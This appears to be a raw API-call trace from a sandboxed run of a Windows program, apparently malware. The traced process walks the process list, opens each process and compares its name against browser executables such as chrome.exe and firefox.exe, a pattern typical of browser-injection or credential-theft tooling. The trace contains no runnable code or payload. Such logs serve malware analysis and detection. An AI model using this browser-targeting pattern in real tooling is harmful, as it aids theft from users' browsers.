	[0198.015] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0198.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1538
	[0198.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.016] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0198.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.016] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.017] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0198.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.017] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.017] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0198.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x153c
	[0198.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.018] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0198.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.018] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.019] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0198.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.019] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.019] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0198.020] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1540
	[0198.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.020] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0198.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.020] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.021] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0198.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.021] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.021] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0198.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1544
	[0198.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.022] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0198.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.022] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.023] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0198.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.023] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.023] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0198.024] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1548
	[0198.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.024] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0198.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.024] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.025] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0198.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.025] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.025] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0198.026] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x154c
	[0198.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.026] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0198.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.026] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.026] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0198.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.027] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.027] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1550
	[0198.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.028] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.028] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.028] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.029] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.029] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.030] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1554
	[0198.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.030] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.030] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.030] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.031] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.031] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1558
	[0198.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.032] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.032] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.032] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.033] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.033] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x155c
	[0198.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.034] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.034] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.035] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.035] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.035] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1560
	[0198.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.036] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.036] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.037] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.037] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.037] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1564
	[0198.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.038] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.038] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.039] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.039] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.039] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.040] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1568
	[0198.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.040] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.040] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.041] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.041] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.041] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0198.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x156c
	[0198.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.042] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0198.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.042] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.085] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0198.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.085] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.086] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.086] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1570
	[0198.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.087] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.087] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.087] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.087] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.088] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0198.088] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1574
	[0198.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.088] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.089] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.089] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.089] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.090] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0198.090] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1578
	[0198.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.091] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0198.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.091] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.091] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0198.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.092] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.092] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x157c
	[0198.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.093] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.093] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.093] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.094] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.094] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0198.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1580
	[0198.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.095] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0198.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.095] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.095] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0198.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.096] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.096] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0198.096] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1584
	[0198.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.097] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0198.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.097] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.097] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0198.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.098] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.098] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0198.098] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1588
	[0198.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.099] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0198.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.099] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.099] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0198.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.099] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.100] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0198.100] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x158c
	[0198.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.100] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0198.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.101] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.101] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0198.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.101] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.102] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0198.102] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0198.102] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0198.103] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1590
	[0198.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.103] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0198.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.104] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.104] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0198.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.105] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.105] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0198.106] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1594
	[0198.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.106] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0198.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.107] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.107] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0198.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.107] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.107] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0198.108] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1598
	[0198.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.108] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0198.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
